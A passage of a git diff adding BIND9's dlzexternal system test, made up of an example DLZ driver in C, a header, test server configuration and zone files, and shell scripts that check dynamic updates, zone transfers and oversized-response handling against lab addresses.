+ uint16_t port = 0; + + switch (addr->type.sa.sa_family) { + case AF_INET: + port = ntohs(addr->type.sin.sin_port); + ret = inet_ntop(AF_INET, &addr->type.sin.sin_addr, addr_buf, + sizeof(addr_buf)); + break; + case AF_INET6: + port = ntohs(addr->type.sin6.sin6_port); + ret = inet_ntop(AF_INET6, &addr->type.sin6.sin6_addr, addr_buf, + sizeof(addr_buf)); + break; + default: + return (ISC_R_FAILURE); + } + + if (ret == NULL) { + return (ISC_R_FAILURE); + } + + snprintf(buffer, size, "%s#%u", addr_buf, port); + return (ISC_R_SUCCESS); +} + +/* + * Return the version of the API + */ +int +dlz_version(unsigned int *flags) { + UNUSED(flags); + return (DLZ_DLOPEN_VERSION); +} + +/* + * Remember a helper function from the bind9 dlz_dlopen driver + */ +static void +b9_add_helper(struct dlz_example_data *state, const char *helper_name, + void *ptr) { + if (strcmp(helper_name, "log") == 0) { + state->log = (log_t *)ptr; + } + if (strcmp(helper_name, "putrr") == 0) { + state->putrr = (dns_sdlz_putrr_t *)ptr; + } + if (strcmp(helper_name, "putnamedrr") == 0) { + state->putnamedrr = (dns_sdlz_putnamedrr_t *)ptr; + } + if (strcmp(helper_name, "writeable_zone") == 0) { + state->writeable_zone = (dns_dlz_writeablezone_t *)ptr; + } +} + +/* + * Called to initialize the driver + */ +isc_result_t +dlz_create(const char *dlzname, unsigned int argc, char *argv[], void **dbdata, + ...) { + struct dlz_example_data *state; + const char *helper_name; + va_list ap; + char soa_data[sizeof("@ hostmaster.root 123 900 600 86400 3600")]; + isc_result_t result; + size_t n; + + UNUSED(dlzname); + + state = calloc(1, sizeof(struct dlz_example_data)); + if (state == NULL) { + return (ISC_R_NOMEMORY); + } + + /* Fill in the helper functions */ + va_start(ap, dbdata); + while ((helper_name = va_arg(ap, const char *)) != NULL) { + b9_add_helper(state, helper_name, va_arg(ap, void *)); + } + va_end(ap); + + if (argc < 2 || argv[1][0] == '\0') { + logerr("dlz_example: please specify a zone name"); + dlz_destroy(state); + return (ISC_R_FAILURE); + } + + /* Ensure zone name is absolute */ + state->zone_name = malloc(strlen(argv[1]) + 2); + if (state->zone_name == NULL) { + free(state); + return (ISC_R_NOMEMORY); + } + if (argv[1][strlen(argv[1]) - 1] == '.') { + strcpy(state->zone_name, argv[1]); + } else { + sprintf(state->zone_name, "%s.", argv[1]); + } + + /* + * Use relative names to trigger ISC_R_NOSPACE in dns_sdlz_putrr. + */ + if (strcmp(state->zone_name, ".") == 0) { + n = strlcpy(soa_data, + "@ hostmaster.root 123 900 600 86400 3600", + sizeof(soa_data)); + } else { + n = strlcpy(soa_data, "@ hostmaster 123 900 600 86400 3600", + sizeof(soa_data)); + } + + if (n >= sizeof(soa_data)) { + CHECK(ISC_R_NOSPACE); + } + + add_name(state, &state->current[0], state->zone_name, "soa", 3600, + soa_data); + add_name(state, &state->current[0], state->zone_name, "ns", 3600, + state->zone_name); + add_name(state, &state->current[0], state->zone_name, "a", 1800, + "10.53.0.1"); + + loginfo("dlz_example: started for zone %s", state->zone_name); + + *dbdata = state; + return (ISC_R_SUCCESS); + +failure: + free(state); + return (result); +} + +/* + * Shut down the backend + */ +void +dlz_destroy(void *dbdata) { + struct dlz_example_data *state = (struct dlz_example_data *)dbdata; + + loginfo("dlz_example: shutting down zone %s", state->zone_name); + free(state->zone_name); + free(state); +} + +/* + * See if we handle a given zone + */ +isc_result_t +dlz_findzonedb(void *dbdata, const char *name, dns_clientinfomethods_t *methods, + dns_clientinfo_t *clientinfo) { + struct dlz_example_data *state = (struct dlz_example_data *)dbdata; + isc_sockaddr_t *src; + char addrbuf[100]; + char absolute[1024]; + + strcpy(addrbuf, "unknown"); + if (methods != NULL && methods->sourceip != NULL && + methods->version - methods->age <= DNS_CLIENTINFOMETHODS_VERSION && + DNS_CLIENTINFOMETHODS_VERSION <= methods->version) + { + methods->sourceip(clientinfo, &src); + fmt_address(src, addrbuf, sizeof(addrbuf)); + } + + loginfo("dlz_example: dlz_findzonedb called with name '%s' " + "in zone DB '%s' from %s", + name, state->zone_name, addrbuf); + + /* + * Returning ISC_R_NOTFOUND will cause the query logic to + * check the database for parent names, looking for zone cuts. + * + * Returning ISC_R_NOMORE prevents the query logic from doing + * this; it will move onto the next database after a single query. + */ + if (strcasecmp(name, "test.example.com") == 0) { + return (ISC_R_NOMORE); + } + + /* + * For example.net, only return ISC_R_NOMORE when queried + * from 10.53.0.1. + */ + if (strcasecmp(name, "test.example.net") == 0 && + strncmp(addrbuf, "10.53.0.1", 9) == 0) + { + return (ISC_R_NOMORE); + } + + /* + * For bigcname.domain, return success so it appears to be + * the zone origin; this regression tests a bug in which + * zone origin nodes could fail to return SERVFAIL to the client. + */ + if (strcasecmp(name, "bigcname.domain") == 0) { + return (ISC_R_SUCCESS); + } + + /* + * Return success if we have an exact match between the + * zone name and the qname + */ + if (strcasecmp(state->zone_name, name) == 0) { + return (ISC_R_SUCCESS); + } + + snprintf(absolute, sizeof(absolute), "%s.", name); + if (strcasecmp(state->zone_name, absolute) == 0) { + return (ISC_R_SUCCESS); + } + + return (ISC_R_NOTFOUND); +} + +/* + * Look up one record in the sample database. + * + * If the queryname is "source-addr", send back a TXT record containing + * the address of the client, to test the use of 'methods' and 'clientinfo' + * + * If the queryname is "too-long", send back a TXT record that's too long + * to process; this should result in a SERVFAIL when queried. + */ +isc_result_t +dlz_lookup(const char *zone, const char *name, void *dbdata, + dns_sdlzlookup_t *lookup, dns_clientinfomethods_t *methods, + dns_clientinfo_t *clientinfo) { + isc_result_t result; + struct dlz_example_data *state = (struct dlz_example_data *)dbdata; + bool found = false; + void *dbversion = NULL; + isc_sockaddr_t *src; + char full_name[256]; + char buf[512]; + static char last[256]; + static int count = 0; + int i, size; + + UNUSED(zone); + + if (state->putrr == NULL) { + return (ISC_R_NOTIMPLEMENTED); + } + + if (strcmp(name, "@") == 0) { + size = snprintf(full_name, sizeof(full_name), "%s", + state->zone_name); + } else if (strcmp(state->zone_name, ".") == 0) { + size = snprintf(full_name, sizeof(full_name), "%s.", name); + } else { + size = snprintf(full_name, sizeof(full_name), "%s.%s", name, + state->zone_name); + } + + if (size < 0 || (size_t)size >= sizeof(full_name) || + (size_t)size >= sizeof(last)) + { + return (ISC_R_NOSPACE); + } + + /* + * For test purposes, log all calls to dlz_lookup() + */ + if (strcasecmp(full_name, last) == 0) { + count++; + } else { + count = 1; + memcpy(last, full_name, size + 1); + } + loginfo("lookup #%d for %s", count, full_name); + + /* + * If we need to know the database version (as set in + * the 'newversion' dlz function) we can pick it up from the + * clientinfo. + * + * This allows a lookup to query the correct version of the DNS + * data, if the DLZ can differentiate between versions. + * + * For example, if a new database transaction is created by + * 'newversion', the lookup should query within the same + * transaction scope if it can. + * + * If the DLZ only operates on 'live' data, then version + * wouldn't necessarily be needed. + */ + if (clientinfo != NULL && clientinfo->version >= 2) { + dbversion = clientinfo->dbversion; + if (dbversion != NULL && *(bool *)dbversion) { + loginfo("dlz_example: lookup against live transaction"); + } + } + + if (strcmp(name, "source-addr") == 0) { + char ecsbuf[DNS_ECS_FORMATSIZE] = "not supported"; + strncpy(buf, "unknown", sizeof(buf)); + if (methods != NULL && methods->sourceip != NULL && + (methods->version - methods->age <= + DNS_CLIENTINFOMETHODS_VERSION) && + DNS_CLIENTINFOMETHODS_VERSION <= methods->version) + { + methods->sourceip(clientinfo, &src); + fmt_address(src, buf, sizeof(buf)); + } + if (clientinfo != NULL && clientinfo->version >= 3) { + if (clientinfo->ecs.addr.family != AF_UNSPEC) { + dns_ecs_format(&clientinfo->ecs, ecsbuf, + sizeof(ecsbuf)); + } else { + snprintf(ecsbuf, sizeof(ecsbuf), "%s", + "not present"); + } + } + i = strlen(buf); + snprintf(buf + i, sizeof(buf) - i - 1, " ECS %s", ecsbuf); + + loginfo("dlz_example: lookup connection from %s", buf); + + found = true; + result = state->putrr(lookup, "TXT", 0, buf); + if (result != ISC_R_SUCCESS) { + return (result); + } + } + + if (strcmp(name, "too-long") == 0 || + strcmp(zone, "bigcname.domain") == 0) + { + for (i = 0; i < 511; i++) { + buf[i] = 'x'; + } + buf[i] = '\0'; + found = true; + result = state->putrr(lookup, "TXT", 0, buf); + if (result != ISC_R_SUCCESS) { + return (result); + } + } + + /* Tests for DLZ redirection zones */ + if (strcmp(name, "*") == 0 && strcmp(zone, ".") == 0) { + result = state->putrr(lookup, "A", 0, "100.100.100.2"); + found = true; + if (result != ISC_R_SUCCESS) { + return (result); + } + } + + if (strcmp(name, "long.name.is.not.there") == 0 && + strcmp(zone, ".") == 0) + { + result = state->putrr(lookup, "A", 0, "100.100.100.3"); + found = true; + if (result != ISC_R_SUCCESS) { + return (result); + } + } + + /* Answer from current records */ + for (i = 0; i < MAX_RECORDS; i++) { + if (strcasecmp(state->current[i].name, full_name) == 0) { + found = true; + result = state->putrr(lookup, state->current[i].type, + state->current[i].ttl, + state->current[i].data); + if (result != ISC_R_SUCCESS) { + return (result); + } + } + } + + if (!found) { + return (ISC_R_NOTFOUND); + } + + return (ISC_R_SUCCESS); +} + +/* + * See if a zone transfer is allowed + */ +isc_result_t +dlz_allowzonexfr(void *dbdata, const char *name, const char *client) { + struct dlz_example_data *state = (struct dlz_example_data *)dbdata; + isc_result_t result; + + loginfo("dlz_example: dlz_allowzonexfr called for %s", name); + + result = dlz_findzonedb(dbdata, name, NULL, NULL); + if (result != ISC_R_SUCCESS) { + loginfo("dlz_example: findzonedb returned %s", + isc_result_totext(result)); + return (result); + } + + /* + * Exception for "example.org" so we can test the use of + * the view ACL. + */ + if (strcmp(name, "example.org") == 0) { + loginfo("dlz_example: use view ACL for example.org"); + return (ISC_R_DEFAULT); + } + + /* + * Exception for 10.53.0.5 so we can test that allow-transfer + * is effective. + */ + if (strcmp(client, "10.53.0.5") == 0) { + loginfo("dlz_example: disallow transfer to 10.53.0.5"); + return (ISC_R_NOPERM); + } + + loginfo("dlz_example: transfer allowed for %s", name); + + return (ISC_R_SUCCESS); +} + +/* + * Perform a zone transfer + */ +isc_result_t +dlz_allnodes(const char *zone, void *dbdata, dns_sdlzallnodes_t *allnodes) { + struct dlz_example_data *state = (struct dlz_example_data *)dbdata; + int i; + + UNUSED(zone); + + if (state->putnamedrr == NULL) { + return (ISC_R_NOTIMPLEMENTED); + } + + for (i = 0; i < MAX_RECORDS; i++) { + isc_result_t result; + if (strlen(state->current[i].name) == 0U) { + continue; + } + result = state->putnamedrr(allnodes, state->current[i].name, + state->current[i].type, + state->current[i].ttl, + state->current[i].data); + if (result != ISC_R_SUCCESS) { + return (result); + } + } + + return (ISC_R_SUCCESS); +} + +/* + * Start a transaction + */ +isc_result_t +dlz_newversion(const char *zone, void *dbdata, void **versionp) { + struct dlz_example_data *state = (struct dlz_example_data *)dbdata; + + if (state->transaction_started) { + loginfo("dlz_example: transaction already started for zone %s", + zone); + return (ISC_R_FAILURE); + } + + state->transaction_started = true; + *versionp = (void *)&state->transaction_started; + + return (ISC_R_SUCCESS); +} + +/* + * End a transaction + */ +void +dlz_closeversion(const char *zone, bool commit, void *dbdata, void **versionp) { + struct dlz_example_data *state = (struct dlz_example_data *)dbdata; + + if (!state->transaction_started) { + loginfo("dlz_example: transaction not started for zone %s", + zone); + *versionp = NULL; + return; + } + + state->transaction_started = false; + + *versionp = NULL; + + if (commit) { + int i; + loginfo("dlz_example: committing transaction on zone %s", zone); + for (i = 0; i < MAX_RECORDS; i++) { + if (strlen(state->deletes[i].name) > 0U) { + (void)del_name(state, &state->current[0], + state->deletes[i].name, + state->deletes[i].type, + state->deletes[i].ttl, + state->deletes[i].data); + } + } + for (i = 0; i < MAX_RECORDS; i++) { + if (strlen(state->adds[i].name) > 0U) { + (void)add_name(state, &state->current[0], + state->adds[i].name, + state->adds[i].type, + state->adds[i].ttl, + state->adds[i].data); + } + } + } else { + loginfo("dlz_example: cancelling transaction on zone %s", zone); + } + memset(state->adds, 0, sizeof(state->adds)); + memset(state->deletes, 0, sizeof(state->deletes)); +} + +/* + * Configure a writeable zone + */ +isc_result_t +dlz_configure(dns_view_t *view, dns_dlzdb_t *dlzdb, void *dbdata) { + struct dlz_example_data *state = (struct dlz_example_data *)dbdata; + isc_result_t result; + + loginfo("dlz_example: starting configure"); + + if (state->writeable_zone == NULL) { + loginfo("dlz_example: no writeable_zone method available"); + return (ISC_R_FAILURE); + } + + result = state->writeable_zone(view, dlzdb, state->zone_name); + if (result != ISC_R_SUCCESS) { + loginfo("dlz_example: failed to configure zone %s", + state->zone_name); + return (result); + } + + loginfo("dlz_example: configured writeable zone %s", state->zone_name); + return (ISC_R_SUCCESS); +} + +/* + * Authorize a zone update + */ +bool +dlz_ssumatch(const char *signer, const char *name, const char *tcpaddr, + const char *type, const char *key, uint32_t keydatalen, + unsigned char *keydata, void *dbdata) { + struct dlz_example_data *state = (struct dlz_example_data *)dbdata; + + UNUSED(tcpaddr); + UNUSED(type); + UNUSED(key); + UNUSED(keydatalen); + UNUSED(keydata); + + if (strncmp(name, "deny.", 5) == 0) { + loginfo("dlz_example: denying update of name=%s by %s", name, + signer); + return (false); + } + loginfo("dlz_example: allowing update of name=%s by %s", name, signer); + return (true); +} + +static isc_result_t +modrdataset(struct dlz_example_data *state, const char *name, + const char *rdatastr, struct record *list) { + char *full_name, *dclass, *type, *data, *ttlstr, *buf; + char absolute[1024]; + isc_result_t result; + char *saveptr = NULL; + + buf = strdup(rdatastr); + if (buf == NULL) { + return (ISC_R_FAILURE); + } + + /* + * The format is: + * FULLNAME\tTTL\tDCLASS\tTYPE\tDATA + * + * The DATA field is space separated, and is in the data format + * for the type used by dig + */ + + full_name = strtok_r(buf, "\t", &saveptr); + if (full_name == NULL) { + goto error; + } + + ttlstr = strtok_r(NULL, "\t", &saveptr); + if (ttlstr == NULL) { + goto error; + } + + dclass = strtok_r(NULL, "\t", &saveptr); + if (dclass == NULL) { + goto error; + } + + type = strtok_r(NULL, "\t", &saveptr); + if (type == NULL) { + goto error; + } + + data = strtok_r(NULL, "\t", &saveptr); + if (data == NULL) { + goto error; + } + + if (name[strlen(name) - 1] != '.') { + snprintf(absolute, sizeof(absolute), "%s.", name); + name = absolute; + } + + result = add_name(state, list, name, type, strtoul(ttlstr, NULL, 10), + data); + free(buf); + return (result); + +error: + free(buf); + return (ISC_R_FAILURE); +} + +isc_result_t +dlz_addrdataset(const char *name, const char *rdatastr, void *dbdata, + void *version) { + struct dlz_example_data *state = (struct dlz_example_data *)dbdata; + + if (version != (void *)&state->transaction_started) { + return (ISC_R_FAILURE); + } + + loginfo("dlz_example: adding rdataset %s '%s'", name, rdatastr); + + return (modrdataset(state, name, rdatastr, &state->adds[0])); +} + +isc_result_t +dlz_subrdataset(const char *name, const char *rdatastr, void *dbdata, + void *version) { + struct dlz_example_data *state = (struct dlz_example_data *)dbdata; + + if (version != (void *)&state->transaction_started) { + return (ISC_R_FAILURE); + } + + loginfo("dlz_example: subtracting rdataset %s '%s'", name, rdatastr); + + return (modrdataset(state, name, rdatastr, &state->deletes[0])); +} + +isc_result_t +dlz_delrdataset(const char *name, const char *type, void *dbdata, + void *version) { + struct dlz_example_data *state = (struct dlz_example_data *)dbdata; + + if (version != (void *)&state->transaction_started) { + return (ISC_R_FAILURE); + } + + loginfo("dlz_example: deleting rdataset %s of type %s", name, type); + + return (ISC_R_SUCCESS); +} diff --git a/bin/tests/system/dlzexternal/driver.h b/bin/tests/system/dlzexternal/driver.h new file mode 100644 index 0000000..2c1a594 --- /dev/null +++ b/bin/tests/system/dlzexternal/driver.h @@ -0,0 +1,35 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +#pragma once + +#include <dns/dlz_dlopen.h> + +/* + * This header includes the declarations of entry points. + */ + +dlz_dlopen_version_t dlz_version; +dlz_dlopen_create_t dlz_create; +dlz_dlopen_destroy_t dlz_destroy; +dlz_dlopen_findzonedb_t dlz_findzonedb; +dlz_dlopen_lookup_t dlz_lookup; +dlz_dlopen_allowzonexfr_t dlz_allowzonexfr; +dlz_dlopen_allnodes_t dlz_allnodes; +dlz_dlopen_newversion_t dlz_newversion; +dlz_dlopen_closeversion_t dlz_closeversion; +dlz_dlopen_configure_t dlz_configure; +dlz_dlopen_ssumatch_t dlz_ssumatch; +dlz_dlopen_addrdataset_t dlz_addrdataset; +dlz_dlopen_subrdataset_t dlz_subrdataset; +dlz_dlopen_delrdataset_t dlz_delrdataset; diff --git a/bin/tests/system/dlzexternal/ns1/dlzs.conf.in b/bin/tests/system/dlzexternal/ns1/dlzs.conf.in new file mode 100644 index 0000000..9166cd6 --- /dev/null +++ b/bin/tests/system/dlzexternal/ns1/dlzs.conf.in @@ -0,0 +1,44 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, You can obtain one at http://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +dlz "example one" { + database "dlopen ../driver.@SO@ example.nil"; +}; + +dlz "example two" { + database "dlopen ../driver.@SO@ alternate.nil"; +}; + +dlz "example three" { + database "dlopen ../driver.@SO@ example.org"; +}; + +dlz "example four" { + // Long zone name to trigger ISC_R_NOSPACE in dns_sdlz_putrr. + database "dlopen ../driver.@SO@ 123456789.123456789.123456789.123456789.123456789.example.foo"; +}; + +dlz "unsearched1" { + database "dlopen ../driver.@SO@ other.nil"; + search no; +}; + +dlz "unsearched2" { + database "dlopen ../driver.@SO@ zone.nil"; + search no; +}; + +dlz redzone { + database "dlopen ../driver.@SO@ ."; + search no; +}; diff --git a/bin/tests/system/dlzexternal/ns1/named.conf.in b/bin/tests/system/dlzexternal/ns1/named.conf.in new file mode 100644 index 0000000..b30ae8e --- /dev/null +++ b/bin/tests/system/dlzexternal/ns1/named.conf.in @@ -0,0 +1,54 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + session-keyfile "session.key"; + listen-on { 10.53.0.1; 127.0.0.1; }; + listen-on-v6 { none; }; + allow-transfer { !10.53.0.1; any; }; + recursion no; + notify yes; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +include "ddns.key"; + +controls { + inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +include "dlzs.conf"; + +zone zone.nil { + type primary; + dlz unsearched2; +}; + +zone "." { + type redirect; + dlz redzone; +}; + +zone "." { + type primary; + file "root.db"; +}; diff --git a/bin/tests/system/dlzexternal/ns1/root.db b/bin/tests/system/dlzexternal/ns1/root.db new file mode 100644 index 0000000..6cbe579 --- /dev/null +++ b/bin/tests/system/dlzexternal/ns1/root.db @@ -0,0 +1,26 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +. IN SOA gson.nominum.com. a.root.servers.nil. ( + 2000042100 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 600 ; minimum + ) +. NS a.root-servers.nil. +a.root-servers.nil. A 10.53.0.1 + +example. NS ns1.example. +ns1.example. A 10.53.0.1 + +exists. A 10.10.10.10 diff --git a/bin/tests/system/dlzexternal/prereq.sh b/bin/tests/system/dlzexternal/prereq.sh new file mode 100644 index 0000000..9c161c2 --- /dev/null +++ b/bin/tests/system/dlzexternal/prereq.sh @@ -0,0 +1,27 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +$FEATURETEST --have-dlopen || { + echo_i "dlopen() not supported - skipping dlzexternal test" + exit 255 +} + +$FEATURETEST --tsan && { + echo_i "TSAN - skipping dlzexternal test" + exit 255 +} + +exit 0 diff --git a/bin/tests/system/dlzexternal/setup.sh b/bin/tests/system/dlzexternal/setup.sh new file mode 100644 index 0000000..6d6b4d4 --- /dev/null +++ b/bin/tests/system/dlzexternal/setup.sh @@ -0,0 +1,19 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +$DDNSCONFGEN -q -z example.nil > ns1/ddns.key + +copy_setports ns1/named.conf.in ns1/named.conf diff --git a/bin/tests/system/dlzexternal/tests.sh b/bin/tests/system/dlzexternal/tests.sh new file mode 100644 index 0000000..ab35051 --- /dev/null +++ b/bin/tests/system/dlzexternal/tests.sh @@ -0,0 +1,230 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +status=0 +n=0 + +DIGOPTS="@10.53.0.1 -p ${PORT} +nocookie" +RNDCCMD="$RNDC -c $SYSTEMTESTTOP/common/rndc.conf -p ${CONTROLPORT} -s" + +newtest() { + n=`expr $n + 1` + echo_i "${1} (${n})" + ret=0 +} + +test_update() { + host="$1" + type="$2" + cmd="$3" + digout="$4" + should_fail="$5" + + cat <<EOF > ns1/update.txt +server 10.53.0.1 ${PORT} +update add $host $cmd +send +EOF + + newtest "testing update for $host $type $cmd${comment:+ }$comment" + $NSUPDATE -k ns1/ddns.key ns1/update.txt > /dev/null 2>&1 || { + [ "$should_fail" ] || \ + echo_i "update failed for $host $type $cmd" + return 1 + } + + out=`$DIG $DIGOPTS -t $type -q $host | grep -E "^$host"` + lines=`echo "$out" | grep "$digout" | wc -l` + [ $lines -eq 1 ] || { + [ "$should_fail" ] || \ + echo_i "dig output incorrect for $host $type $cmd: $out" + return 1 + } + return 0 +} + +test_update testdc1.example.nil. A "86400 A 10.53.0.10" "10.53.0.10" || ret=1 +status=`expr $status + $ret` + +test_update testdc2.example.nil. A "86400 A 10.53.0.11" "10.53.0.11" || ret=1 +status=`expr $status + $ret` + +test_update testdc3.example.nil. A "86400 A 10.53.0.10" "10.53.0.10" || ret=1 +status=`expr $status + $ret` + +test_update deny.example.nil. TXT "86400 TXT helloworld" "helloworld" should_fail && ret=1 +status=`expr $status + $ret` + +newtest "testing nxrrset" +$DIG $DIGOPTS testdc1.example.nil AAAA > dig.out.$n +grep "status: NOERROR" dig.out.$n > /dev/null || ret=1 +grep "ANSWER: 0" dig.out.$n > /dev/null || ret=1 +status=`expr $status + $ret` + +newtest "testing prerequisites are checked correctly" +cat > ns1/update.txt << EOF +server 10.53.0.1 ${PORT} +prereq nxdomain testdc3.example.nil +update add testdc3.example.nil 86500 in a 10.53.0.12 +send +EOF +$NSUPDATE -k ns1/ddns.key ns1/update.txt > /dev/null 2>&1 && ret=1 +out=`$DIG $DIGOPTS +short a testdc3.example.nil` +[ "$out" = "10.53.0.12" ] && ret=1 +[ "$ret" -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +newtest "testing passing client info into DLZ driver" +out=`$DIG $DIGOPTS +short -t txt -q source-addr.example.nil | grep -v '^;'` +addr=`eval echo "$out" | cut -f1 -d'#'` +[ "$addr" = "10.53.0.1" ] || ret=1 +[ "$ret" -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +newtest "testing DLZ driver is cleaned up on reload" +rndc_reload ns1 10.53.0.1 +for i in 0 1 2 3 4 5 6 7 8 9; do + ret=0 + grep 'dlz_example: shutting down zone example.nil' ns1/named.run > /dev/null 2>&1 || ret=1 + [ "$ret" -eq 0 ] && break + sleep 1 +done +[ "$ret" -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +newtest "testing multiple DLZ drivers" +test_update testdc1.alternate.nil. A "86400 A 10.53.0.10" "10.53.0.10" || ret=1 +status=`expr $status + $ret` + +newtest "testing AXFR from DLZ drivers" +$DIG $DIGOPTS +noall +answer axfr example.nil > dig.out.example.ns1.test$n +lines=`cat dig.out.example.ns1.test$n | wc -l` +[ ${lines:-0} -eq 4 ] || ret=1 +$DIG $DIGOPTS +noall +answer axfr alternate.nil > dig.out.alternate.ns1.test$n +lines=`cat dig.out.alternate.ns1.test$n | wc -l` +[ ${lines:-0} -eq 5 ] || ret=1 +[ "$ret" -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +newtest "testing AXFR denied from DLZ drivers" +$DIG $DIGOPTS -b 10.53.0.5 +noall +answer axfr example.nil > dig.out.example.ns1.test$n +grep "; Transfer failed" dig.out.example.ns1.test$n > /dev/null || ret=1 +$DIG $DIGOPTS -b 10.53.0.5 +noall +answer axfr alternate.nil > dig.out.alternate.ns1.test$n +grep "; Transfer failed" dig.out.alternate.ns1.test$n > /dev/null || ret=1 +[ "$ret" -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +newtest "testing AXFR denied based on view ACL" +# 10.53.0.1 should be disallowed +$DIG $DIGOPTS -b 10.53.0.1 +noall +answer axfr example.org > dig.out.example.ns1.test$n.1 +grep "; Transfer failed" dig.out.example.ns1.test$n.1 > /dev/null || ret=1 +# 10.53.0.2 should be allowed +$DIG $DIGOPTS -b 10.53.0.2 +noall +answer axfr example.org > dig.out.example.ns1.test$n.2 +grep "; Transfer failed" dig.out.example.ns1.test$n.2 > /dev/null && ret=1 +[ "$ret" -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +newtest "testing unsearched/unregistered DLZ zone is not found" +$DIG $DIGOPTS +noall +answer ns other.nil > dig.out.ns1.test$n +grep "3600.IN.NS.other.nil." dig.out.ns1.test$n > /dev/null && ret=1 +[ "$ret" -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +newtest "testing unsearched/registered DLZ zone is found" +$DIG $DIGOPTS +noall +answer ns zone.nil > dig.out.ns1.test$n +grep "3600.IN.NS.zone.nil." dig.out.ns1.test$n > /dev/null || ret=1 +[ "$ret" -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +newtest "testing unsearched/registered DLZ zone is found" +$DIG $DIGOPTS +noall +answer ns zone.nil > dig.out.ns1.test$n +grep "3600.IN.NS.zone.nil." dig.out.ns1.test$n > /dev/null || ret=1 +[ "$ret" -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +newtest "testing correct behavior with findzone returning ISC_R_NOMORE" +$DIG $DIGOPTS +noall a test.example.com > /dev/null 2>&1 || ret=1 +# we should only find one logged lookup per searched DLZ database +lines=`grep "dlz_findzonedb.*test\.example\.com.*example.nil" ns1/named.run | wc -l` +[ $lines -eq 1 ] || ret=1 +lines=`grep "dlz_findzonedb.*test\.example\.com.*alternate.nil" ns1/named.run | wc -l` +[ $lines -eq 1 ] || ret=1 +[ "$ret" -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +newtest "testing findzone can return different results per client" +$DIG $DIGOPTS -b 10.53.0.1 +noall a test.example.net > /dev/null 2>&1 || ret=1 +# we should only find one logged lookup per searched DLZ database +lines=`grep "dlz_findzonedb.*example\.net.*example.nil" ns1/named.run | wc -l` +[ $lines -eq 1 ] || ret=1 +lines=`grep "dlz_findzonedb.*example\.net.*alternate.nil" ns1/named.run | wc -l` +[ $lines -eq 1 ] || ret=1 +$DIG $DIGOPTS -b 10.53.0.2 +noall a test.example.net > /dev/null 2>&1 || ret=1 +# we should find several logged lookups this time +lines=`grep "dlz_findzonedb.*example\.net.*example.nil" ns1/named.run | wc -l` +[ $lines -gt 2 ] || ret=1 +lines=`grep "dlz_findzonedb.*example\.net.*alternate.nil" ns1/named.run | wc -l` +[ $lines -gt 2 ] || ret=1 +[ "$ret" -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +newtest "testing zone returning oversized data" +$DIG $DIGOPTS txt too-long.example.nil > dig.out.ns1.test$n 2>&1 || ret=1 +grep "status: SERVFAIL" dig.out.ns1.test$n > /dev/null || ret=1 +[ "$ret" -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +newtest "testing zone returning oversized data at zone origin" +$DIG $DIGOPTS txt bigcname.domain > dig.out.ns1.test$n 2>&1 || ret=1 +grep "status: SERVFAIL" 